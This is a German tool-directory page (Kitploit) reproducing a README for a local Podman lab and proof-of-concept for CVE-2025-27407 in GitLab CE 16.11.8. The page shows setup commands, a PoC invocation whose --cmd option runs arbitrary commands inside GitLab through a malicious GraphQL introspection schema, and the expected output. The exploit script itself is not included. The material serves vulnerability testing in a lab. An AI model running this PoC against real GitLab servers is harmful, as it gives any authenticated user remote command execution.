Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-27407 | Kitploit
Tools/GitHubGitHub/logggg2402/cve-2025-27407
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHublogggg2402/cve-2025-27407

CVE-2025-27407

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-27407 GitLab-Podman-Labor

Minimales rein lokales Labor zum Nachweis, dass der GitLab-Direct-Transfer-HTTP-Pfad den verwundbaren graphql-ruby-Introspection-Schema-Loader erreicht. Das Labor betreibt einen einzelnen verwundbaren GitLab-CE-Container; das PoC-Skript startet seinen simulierten GitLab-Quellserver nur während der Tests prozessintern.

Führen Sie dies nur gegen Systeme aus, die Ihnen gehören oder für die Sie ausdrücklich autorisiert sind, Tests durchzuführen.

Dateien

DateiZweck
lab.shStartet, wartet, verifiziert und bereinigt das GitLab-Labor.
poc_host_port_cmd.pyEinmaliger PoC: simulierter Quellserver + GitLab-Anmelde-/Konfigurations-/Import-Trigger.

Anforderungen

  • Linux-Host mit podman
  • curl
  • Freie lokale Ports für GitLab und den simulierten PoC-Quellserver
  • Ausreichend RAM/Speicherplatz für den GitLab-Omnibus-Container

Standardwerte:

Labor starten

Port 8080 ist die Standardeinstellung des Skripts. Falls etwas anderes diesen bereits verwendet, nutzen Sie 18080 wie hier gezeigt.

root@kitploit:~
cd gitlab-lab
chmod +x lab.sh poc_host_port_cmd.py

GITLAB_HTTP_PORT=18080 GITLAB_SSH_PORT=2225 ./lab.sh up

Öffnen Sie GitLab unter:

root@kitploit:~
http://127.0.0.1:18080

Anmeldedaten:

root@kitploit:~
root / Cve27407Password!

root ist nur der Standard-Laborbenutzer. Der PoC-Trigger benötigt kein Administratorkonto; jeder authentifizierte Benutzer, der in einem Ziel-Namespace erstellen/importieren kann, kann den verwundbaren Direct-Transfer-Pfad erreichen. Verwenden Sie --username und --password, um mit einem Nicht-Administrator zu testen.

PoC ausführen

root@kitploit:~
MARKER=/tmp/cve_2025_27407_gitlab_marker
podman exec cve-27407-gitlab rm -f "$MARKER"

./poc_host_port_cmd.py \
  --host 127.0.0.1 \
  --port 18080 \
  --listen-port 8001 \
  --wait-seconds 120 \
  --cmd "touch $MARKER"

MARKER="$MARKER" ./lab.sh verify

Erwartete Signale:

root@kitploit:~
[*] create/import trigger status=200 final_url=http://127.0.0.1:18080/import/bulk_imports
[{"success":true,...}]
[evil-source] POST /api/graphql introspection -> malicious schema; command='touch ...'
[+] GitLab reached /api/graphql introspection over HTTP
[+] vulnerable: marker file exists inside GitLab container

Optionen

Umgebungsüberschreibungen

Fehlerbehebung

  • Falls 8080 belegt ist, verwenden Sie GITLAB_HTTP_PORT=18080 für ./lab.sh up.
  • Falls das PoC seinen Quellport nicht binden kann, ändern Sie --listen-port auf einen ungenutzten Port.
  • Falls die Marker-Verifizierung mit dem Hintergrund-Import-Worker kollidiert, erhöhen Sie --wait-seconds oder führen Sie MARKER="$MARKER" ./lab.sh verify erneut aus.
  • Falls GitLab noch nicht bereit ist, führen Sie GITLAB_HTTP_PORT=18080 ./lab.sh wait erneut aus.
  • Falls ein vorheriges Labor hängt, führen Sie ./lab.sh cleanup aus und starten Sie erneut.

Bereinigung

root@kitploit:~
./lab.sh cleanup

Dies entfernt den GitLab-Container, alle alten Fake-Quellcontainer aus früheren Laborversionen und das Labornetzwerk. Heruntergeladene Podman-Images werden nicht entfernt.

Tool herunterladen
ElementStandard
GitLab-Imagedocker.io/gitlab/gitlab-ce:16.11.8-ce.0
GitLab-Containercve-27407-gitlab
Podman-Netzwerkcve-2025-27407-net
GitLab-Root-Benutzerroot
GitLab-Root-PasswortCve27407Password!
Marker/tmp/cve_2025_27407_gitlab_marker
OptionZweckStandard
--hostAnzusprechender GitLab-HostErforderlich
--portAnzusprechender GitLab-HTTP-PortErforderlich
--cmdBefehl, der in der GitLab-Laufzeit ausgeführt wirdtouch /tmp/cve_2025_27407_gitlab_marker
--listen-portLokaler Port des simulierten Quellservers8001
--wait-secondsZeit, den simulierten Quellserver für asynchrone GitLab-Worker aktiv zu halten90
--usernameGitLab-Benutzernameroot
--passwordGitLab-PasswortCve27407Password!
VariableZweckStandard
GITLAB_HTTP_PORTHTTP-Port von GitLab (Host/Container)8080
GITLAB_SSH_PORTSSH-Port von GitLab auf dem Host2224
GITLAB_ROOT_PASSWORDInitiales Root-PasswortCve27407Password!
GITLAB_IMAGEZu startendes GitLab-Imagedocker.io/gitlab/gitlab-ce:16.11.8-ce.0
NETWORKName des Podman-Netzwerkscve-2025-27407-net
MARKERDatei, die im GitLab-Container geprüft wird/tmp/cve_2025_27407_gitlab_marker
TIMEOUT_SECONDSTimeout für die Bereitschafts-Wartezeit1200